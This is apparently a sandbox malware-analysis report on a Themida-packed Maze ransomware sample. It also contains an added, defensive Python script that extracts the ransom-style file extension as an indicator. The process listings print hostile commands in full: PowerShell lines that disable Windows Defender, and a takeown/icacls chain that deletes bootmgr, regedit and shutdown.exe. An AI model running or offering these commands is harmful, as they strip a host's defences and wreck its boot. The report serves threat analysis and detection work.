Malware Analysis Report

2024-09-22 14:38

Sample ID 220920-fppw6scac9
Target UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
SHA256 ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1
Tags
maze discovery evasion exploit ransomware themida trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1

Threat Level: Known bad

The file UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe was found to be: Known bad.

Malicious Activity Summary

maze discovery evasion exploit ransomware themida trojan

Maze

Contains code to disable Windows Defender

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Possible privilege escalation attempt

Executes dropped EXE

Disables Task Manager via registry modification

Modifies extensions of user files

Checks BIOS information in registry

Modifies file permissions

Themida packer

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2022-09-20 05:03

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-20 05:03

Reported

2022-09-20 05:08

Platform

win7-20220812-en

Max time kernel

139s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Maze

trojan ransomware maze

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 1992 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1408 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 772 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe

Network

N/A

Files

memory/1992-54-0x0000000000EA0000-0x0000000001316000-memory.dmp

memory/1992-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

memory/1312-58-0x0000000000000000-mapping.dmp

memory/1476-59-0x0000000000000000-mapping.dmp

memory/1712-57-0x0000000000000000-mapping.dmp

memory/1492-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb8901bfb5eb8b5cd51c393f6e11ea2e
SHA1 659d7e2e79485eb006372ff061fdffe0961f5e43
SHA256 bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209
SHA512 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49

memory/832-68-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5 e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1 b552c6af33cc5a62379028687924406cba8ff74d
SHA256 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512 ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

memory/832-70-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-71-0x0000000075281000-0x0000000075283000-memory.dmp

memory/832-72-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-76-0x00000000770A0000-0x0000000077220000-memory.dmp

memory/1712-64-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1476-77-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1312-73-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1492-66-0x000007FEEC170000-0x000007FEECB93000-memory.dmp

memory/1476-82-0x0000000002864000-0x0000000002867000-memory.dmp

memory/1712-84-0x0000000002684000-0x0000000002687000-memory.dmp

memory/1492-83-0x00000000024B4000-0x00000000024B7000-memory.dmp

memory/1312-85-0x0000000002534000-0x0000000002537000-memory.dmp

memory/832-86-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/832-87-0x0000000000280000-0x0000000000AF4000-memory.dmp

memory/1492-79-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1712-80-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1312-81-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1476-78-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp

memory/1492-88-0x000000001B740000-0x000000001BA3F000-memory.dmp

memory/1312-91-0x000000001B950000-0x000000001BC4F000-memory.dmp

memory/1712-90-0x000000001B840000-0x000000001BB3F000-memory.dmp

memory/1476-89-0x000000001B860000-0x000000001BB5F000-memory.dmp

memory/1312-92-0x000000000253B000-0x000000000255A000-memory.dmp

memory/1492-93-0x00000000024BB000-0x00000000024DA000-memory.dmp

memory/1476-94-0x000000000286B000-0x000000000288A000-memory.dmp

memory/1476-97-0x000000000286B000-0x000000000288A000-memory.dmp

memory/1476-96-0x0000000002864000-0x0000000002867000-memory.dmp

memory/1712-95-0x000000000268B000-0x00000000026AA000-memory.dmp

memory/1312-98-0x0000000002534000-0x0000000002537000-memory.dmp

memory/1712-100-0x0000000002684000-0x0000000002687000-memory.dmp

memory/1712-101-0x000000000268B000-0x00000000026AA000-memory.dmp

memory/1312-99-0x000000000253B000-0x000000000255A000-memory.dmp

memory/1492-102-0x00000000024B4000-0x00000000024B7000-memory.dmp

memory/1492-103-0x00000000024BB000-0x00000000024DA000-memory.dmp

memory/772-104-0x0000000000000000-mapping.dmp

memory/108-105-0x0000000000000000-mapping.dmp

memory/540-106-0x0000000000000000-mapping.dmp

memory/1772-107-0x0000000000000000-mapping.dmp

memory/1408-108-0x0000000000000000-mapping.dmp

memory/1796-109-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-20 05:03

Reported

2022-09-20 05:08

Platform

win10v2004-20220812-en

Max time kernel

173s

Max time network

195s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Maze

trojan ransomware maze

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Disables Task Manager via registry modification

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CloseMove.png => C:\Users\Admin\Pictures\CloseMove.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\JoinAssert.crw => C:\Users\Admin\Pictures\JoinAssert.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\OutRedo.png => C:\Users\Admin\Pictures\OutRedo.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\RevokeProtect.png => C:\Users\Admin\Pictures\RevokeProtect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\SendTrace.png => C:\Users\Admin\Pictures\SendTrace.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
File renamed C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
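In both runs (behavioral1 and behavioral2) VSSVC.exe renames user files by appending the same token, .bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe, to the original name and extension. That token has the shape of a mainnet bech32 Bitcoin address (bc1 prefix, bech32 alphabet, 42 characters); the report does not say what it is used for. The script below is an added example, not part of the sandbox report: it takes the eight "File renamed" indicators from the two tables as constructed input, derives the appended extension as an IOC, records which original extensions were hit, and applies a structural bech32 check (the checksum is deliberately not verified, so it is a triage heuristic only). The function names are the example's own.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample input: the "File renamed" indicators listed under
# "Modifies extensions of user files" in the behavioral1 and behavioral2 runs,
# copied from the report as "old => new" pairs.
RENAME_INDICATORS = [
    r"C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\CloseMove.png => C:\Users\Admin\Pictures\CloseMove.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\JoinAssert.crw => C:\Users\Admin\Pictures\JoinAssert.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\OutRedo.png => C:\Users\Admin\Pictures\OutRedo.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\RevokeProtect.png => C:\Users\Admin\Pictures\RevokeProtect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\SendTrace.png => C:\Users\Admin\Pictures\SendTrace.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
    r"C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe",
]

# Bech32 alphabet (BIP 173): 32 symbols, deliberately excluding 1, b, i and o.
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"


def appended_suffix(src, dst):
    """Return the token the malware appended after a dot, or None if the rename
    is not a pure append (e.g. the original name was replaced or scrambled)."""
    if dst.startswith(src + "."):
        return dst[len(src) + 1:]
    return None


def looks_like_bech32_address(token):
    """Structural check for a mainnet bech32 address: 'bc1' prefix, only bech32
    alphabet characters after it, and the 42-character (P2WPKH) or 62-character
    (P2WSH) length. The checksum is NOT verified; this is a triage heuristic,
    not address validation."""
    token = token.lower()
    if not token.startswith("bc1") or len(token) not in (42, 62):
        return False
    return all(c in BECH32_CHARSET for c in token[3:])


def extension_iocs(lines):
    """Group rename indicators by appended suffix and describe each suffix:
    how many files it was applied to, which original extensions were hit, and
    whether the suffix has the shape of a bech32 address."""
    groups = defaultdict(lambda: {"count": 0, "original_exts": set(), "bech32_like": False})
    for line in lines:
        src, dst = line.split(" => ", 1)
        suffix = appended_suffix(src, dst)
        if suffix is None:
            continue
        entry = groups[suffix]
        entry["count"] += 1
        # ntpath handles the backslash-separated Windows paths on any host OS.
        entry["original_exts"].add(ntpath.splitext(src)[1].lower())
        entry["bech32_like"] = looks_like_bech32_address(suffix)
    return {s: {**e, "original_exts": sorted(e["original_exts"])} for s, e in groups.items()}


def suffix_pattern(suffix):
    """Compile a case-insensitive pattern for sweeping a file listing for names
    that carry this suffix as their final extension."""
    return re.compile(r"\." + re.escape(suffix) + r"$", re.I)


if __name__ == "__main__":
    for suffix, info in extension_iocs(RENAME_INDICATORS).items():
        print(f".{suffix}: {info['count']} files, originals {info['original_exts']}, "
              f"bech32-like={info['bech32_like']}")
```

The derived suffix pattern can be run over a directory listing from an affected host to scope the encryption; the bech32 heuristic is only there to tell a payment-address style extension apart from a fixed marker such as .locked.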

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
